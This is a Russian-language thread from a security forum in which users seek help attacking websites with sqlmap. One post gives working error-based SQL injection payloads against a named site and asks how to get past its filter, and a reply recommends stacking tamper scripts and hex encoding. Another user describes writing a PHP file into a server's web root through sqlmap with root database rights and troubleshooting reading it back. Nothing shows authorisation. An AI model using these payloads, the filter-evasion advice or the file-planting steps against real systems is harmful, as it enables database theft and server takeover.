• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Вопрос по sqlmap

ArsenalWest

ArsenalWest

Member
19.03.2020
9
0
BIT
19
Помогите пожалуйста составить запрос для sqlmap
Код: 
site.biz/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/
 

Вложения

  • 2020-06-20_232627.png
    2020-06-20_232627.png
    4,8 КБ · Просмотры: 184
Сортировать по дате Сортировать по голосам
ArsenalWest

ArsenalWest

Member
19.03.2020
9
0
BIT
19
.biz/1'or(ExtractValue(1,concat(0x3a,(SELECT/**/TABLE_NAME/**/FROM/**/information_schema.TABLES/**/LIMIT/**/40,1),(':'))))--'
Имя бд выдает. Подскажите вектор для sqlmap
space2comment не помогает
 
За 0 Против
M

msksmail

Grey Team
29.09.2016
14
21
BIT
296
1. нужно смотреть что фильтрует, ставь verbose 3 минимум
2. space2comment заменяет пробелы “/ ** /” и это не панацея, программа просит использовать тампер и в пример ставит space2comment. Тамперов много, можно что-то написать самому если ничего из базы не подойдет
3. можно использовать сразу несколько тамперов и не забудь еще про --hex или --no-cast
 
За 0 Против
my3uka

my3uka

Member
20.04.2019
15
0
BIT
0
Здравствуйте, спрошу сдесь.
Запись файла на сервер успешна, файл есть на сервере, также он работает через браузер, также он есть если смотреть через шелл.

is-dba: true
user: root
privilege : ALL

sqlmap --file-write=test.php --file-desk=/var/www/my_site/test.php

Потом я хочу его прочитать sqlmap --file-read=/var/www/my_site/test.php, sqlmap не может его прочитать.
Код: 
 [ERROR] no data retrieved

Немогу понять, или ето sqlmap не работает или ??? Запись работает, а чтение нет, как так?
 
За 0 Против
InetTester

InetTester

Green Team
21.10.2018
308
43
BIT
5
my3uka сказал(а):
Здравствуйте, спрошу сдесь.
Запись файла на сервер успешна, файл есть на сервере, также он работает через браузер, также он есть если смотреть через шелл.

is-dba: true
user: root
privilege : ALL

sqlmap --file-write=test.php --file-desk=/var/www/my_site/test.php

Потом я хочу его прочитать sqlmap --file-read=/var/www/my_site/test.php, sqlmap не может его прочитать.
Код: 
 [ERROR] no data retrieved

Немогу понять, или ето sqlmap не работает или ??? Запись работает, а чтение нет, как так?
Нажмите, чтобы раскрыть...

Попробуй его wget-ом или curl-ом и посмотри код ошибки который вернет тебе сервер.
 
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ